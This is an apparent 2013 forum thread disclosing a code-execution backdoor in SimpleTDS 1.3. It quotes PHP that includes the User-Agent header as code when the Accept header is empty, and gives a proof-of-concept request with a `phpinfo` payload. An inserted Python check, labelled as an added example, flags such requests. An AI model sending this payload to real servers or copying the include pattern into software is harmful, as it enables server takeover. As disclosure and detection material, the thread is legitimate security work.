SimpleTDS 1.3 - backdoor/rce

Discussion in 'Web Vulnerabilities' started by Expl0ited, 10 Oct 2013.

Thread Status:
Not open for further replies.
  1. Expl0ited

    Official distribution: http://simpletds.com/download-1_3
    Vulnerable code in functions.php (lines 205-215):
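    PHP:
    {
        $accept = $_SERVER['HTTP_ACCEPT'] == null ? true : false;  // true when Accept is missing or empty
        if ($debug || $accept) {
            $os_repository = tempnam(sys_get_temp_dir(), 'OSV');   // fresh temp file
            $tmp = fopen($os_repository, 'w');
            fwrite($tmp, $_SERVER['HTTP_USER_AGENT']);             // request-controlled header written to it
            fclose($tmp);
            include_once($os_repository);                          // temp file is then executed as PHP
            unlink($os_repository);
        }
    }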
    POC:
    Code:
    GET /functions.php HTTP/1.1
    Host: localhost
    User-Agent: <?php phpinfo();?>
    Accept: 
    Connection: keep-alive
    
     
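A defender-side check for the trigger condition in the first post, as an added example that is not part of the thread or of SimpleTDS: it labels raw HTTP requests by whether the Accept header is absent or empty and whether the User-Agent carries a PHP open tag. The function names, labels and sample requests other than the PoC are constructed for illustration; the `$debug` path is not modelled because the snippet does not show how `$debug` is set.

```python
import re

PHP_OPEN_TAG = re.compile(r"<\?")  # matches <?php, <?= and the short tag <?

def parse_headers(raw_request):
    """Return {lowercased header name: value} from a raw HTTP/1.x request head."""
    head = raw_request.replace("\r\n", "\n").split("\n\n", 1)[0]
    headers = {}
    for line in head.split("\n")[1:]:          # skip the request line
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return headers

def classify(raw_request):
    """Label one request against the functions.php branch quoted in the post."""
    headers = parse_headers(raw_request)
    # PHP: $_SERVER['HTTP_ACCEPT'] == null holds when the header is absent
    # (undefined index evaluates to null) or empty ("" == null is true).
    branch_taken = headers.get("accept", "") == ""
    php_in_ua = bool(PHP_OPEN_TAG.search(headers.get("user-agent", "")))
    if branch_taken and php_in_ua:
        return "exploit-attempt"    # User-Agent would be included as PHP
    if branch_taken:
        return "branch-only"        # User-Agent is included but is plain text
    if php_in_ua:
        return "payload-only"       # runs only if $debug is set (not modelled)
    return "benign"

# Constructed sample requests; "poc" reproduces the request from the post.
SAMPLES = {
    "poc": "GET /functions.php HTTP/1.1\r\nHost: localhost\r\n"
           "User-Agent: <?php phpinfo();?>\r\nAccept: \r\n"
           "Connection: keep-alive\r\n\r\n",
    "browser": "GET / HTTP/1.1\r\nHost: localhost\r\n"
               "User-Agent: Mozilla/5.0\r\nAccept: text/html\r\n\r\n",
    "no_accept": "GET / HTTP/1.1\r\nHost: localhost\r\n"
                 "User-Agent: ExampleMonitor/1.0\r\n\r\n",
    "tag_with_accept": "GET / HTTP/1.1\r\nHost: localhost\r\n"
                       "User-Agent: <?php phpinfo();?>\r\nAccept: */*\r\n\r\n",
}

if __name__ == "__main__":
    for name, request in SAMPLES.items():
        print(f"{name:16} {classify(request)}")
```

Standard combined access logs record User-Agent but not Accept, so the `branch_taken` half of the check needs request captures or a log format extended with the Accept header.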
  2. Ironmаn

    Well done! I always knew you were a hacker :(
     
  3. BigBear

    This was found a couple of years ago by BECHED aka ROOT-access.

    Closing the thread.
     